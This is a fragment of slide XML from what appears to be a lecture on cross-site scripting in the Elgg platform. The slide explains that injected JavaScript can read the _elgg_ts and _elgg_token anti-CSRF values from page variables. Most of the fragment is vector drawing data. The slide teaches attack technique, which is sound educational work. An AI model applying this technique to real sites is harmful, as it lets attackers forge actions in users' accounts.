            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main challenge is to find the values of CSRF countermeasures parameters : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>elgg_ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>elgg_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" sz="3800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Line ① and ②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The secret values are assigned to two JavaScript variables, which make our attack easier as we can load the values from these variables. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our JavaScript code is injected inside the page, so it can access the JavaScript variables inside the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C126E73-DA30-45DD-A8DD-4E8013CF250F}"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Rectangle 1153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A852BC2-19D1-4880-8B21-54DD9A6967BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712872" y="1641849"/>
            <a:ext cx="8061158" cy="1281074"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1643" name="Group 1642">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92B9032-2793-4513-A7CC-7C2E8DA328F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="909638" y="1665288"/>
            <a:ext cx="5829301" cy="1225551"/>
            <a:chOff x="909638" y="1665288"/>
            <a:chExt cx="5829301" cy="1225551"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1485" name="Freeform 826">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D29F6B-C880-4F08-83C9-B2BC2A9951F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="909638" y="1720851"/>
              <a:ext cx="82550" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 237"/>
                <a:gd name="T1" fmla="*/ 30 h 217"/>
                <a:gd name="T2" fmla="*/ 217 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 217"/>
                <a:gd name="T4" fmla="*/ 237 w 237"/>
                <a:gd name="T5" fmla="*/ 15 h 217"/>
                <a:gd name="T6" fmla="*/ 217 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 159 w 237"/>
                <a:gd name="T9" fmla="*/ 0 h 217"/>
                <a:gd name="T10" fmla="*/ 139 w 237"/>
                <a:gd name="T11" fmla="*/ 15 h 217"/>
                <a:gd name="T12" fmla="*/ 159 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 217"/>
                <a:gd name="T14" fmla="*/ 173 w 237"/>
                <a:gd name="T15" fmla="*/ 30 h 217"/>
                <a:gd name="T16" fmla="*/ 118 w 237"/>
                <a:gd name="T17" fmla="*/ 191 h 217"/>
                <a:gd name="T18" fmla="*/ 64 w 237"/>
                <a:gd name="T19" fmla="*/ 30 h 217"/>
                <a:gd name="T20" fmla="*/ 78 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 217"/>
                <a:gd name="T22" fmla="*/ 98 w 237"/>
                <a:gd name="T23" fmla="*/ 15 h 217"/>
                <a:gd name="T24" fmla="*/ 78 w 237"/>
                <a:gd name="T25" fmla="*/ 0 h 217"/>
                <a:gd name="T26" fmla="*/ 20 w 237"/>
                <a:gd name="T27" fmla="*/ 0 h 217"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 15 h 217"/>
                <a:gd name="T30" fmla="*/ 20 w 237"/>
                <a:gd name="T31" fmla="*/ 30 h 217"/>
                <a:gd name="T32" fmla="*/ 35 w 237"/>
                <a:gd name="T33" fmla="*/ 30 h 217"/>
                <a:gd name="T34" fmla="*/ 92 w 237"/>
                <a:gd name="T35" fmla="*/ 200 h 217"/>
                <a:gd name="T36" fmla="*/ 118 w 237"/>
                <a:gd name="T37" fmla="*/ 217 h 217"/>
                <a:gd name="T38" fmla="*/ 145 w 237"/>
                <a:gd name="T39" fmla="*/ 200 h 217"/>
                <a:gd name="T40" fmla="*/ 202 w 237"/>
                <a:gd name="T41" fmla="*/ 3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7" h="217">
                  <a:moveTo>
                    <a:pt x="202" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="217" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="30"/>
                    <a:pt x="237" y="30"/>
                    <a:pt x="237" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="0"/>
                    <a:pt x="225" y="0"/>
                    <a:pt x="217" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="30"/>
                    <a:pt x="151" y="30"/>
                    <a:pt x="159" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="108" y="217"/>
                    <a:pt x="118" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="217"/>
                    <a:pt x="139" y="217"/>
                    <a:pt x="145" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202"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6" name="Freeform 827">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA2464B4-A691-4B54-BA7D-A44CB3C8C3B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1006476" y="1719263"/>
              <a:ext cx="79375" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 204 h 223"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 220 h 223"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 223"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 223"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 223"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 78 h 223"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 223"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 37 h 223"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 60 h 223"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 37 h 223"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 223"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 31 h 223"/>
                <a:gd name="T24" fmla="*/ 149 w 234"/>
                <a:gd name="T25" fmla="*/ 82 h 223"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 223"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 223 h 223"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 204 h 223"/>
                <a:gd name="T32" fmla="*/ 149 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 223"/>
                <a:gd name="T34" fmla="*/ 149 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 223"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 184 h 223"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 223"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 223"/>
                <a:gd name="T42" fmla="*/ 149 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="223">
                  <a:moveTo>
                    <a:pt x="155" y="204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="220"/>
                    <a:pt x="209" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="220"/>
                    <a:pt x="234" y="220"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="187"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="78"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="52"/>
                    <a:pt x="23" y="60"/>
                    <a:pt x="35" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="60"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="33"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="31"/>
                    <a:pt x="81" y="31"/>
                    <a:pt x="86" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="31"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="223"/>
                    <a:pt x="82" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="223"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="175"/>
                    <a:pt x="130" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="132"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="149" y="11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7" name="Freeform 828">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9EFD020-A10A-4129-B717-DED46FC7CC99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1092201" y="1719263"/>
              <a:ext cx="77788" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 30 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 52 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 202 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="78"/>
                    <a:pt x="124" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="42"/>
                    <a:pt x="193" y="52"/>
                    <a:pt x="206" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="52"/>
                    <a:pt x="227" y="44"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="23"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="187"/>
                    <a:pt x="157" y="187"/>
                    <a:pt x="150" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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8" name="Freeform 829">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BC199CC-BC58-4BA8-85E5-B5BA3D457C85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1276351" y="1719263"/>
              <a:ext cx="69850" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 125 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 112 h 223"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 125 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 125 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 169 w 204"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="184" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="125"/>
                    <a:pt x="204" y="125"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="223"/>
                    <a:pt x="115" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="31"/>
                    <a:pt x="108" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="9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9" name="Freeform 830">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650707D3-4941-4E24-95DD-C80119D15CF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1366838" y="1689101"/>
              <a:ext cx="71438" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 21 h 305"/>
                <a:gd name="T2" fmla="*/ 100 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 31 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 31 h 305"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
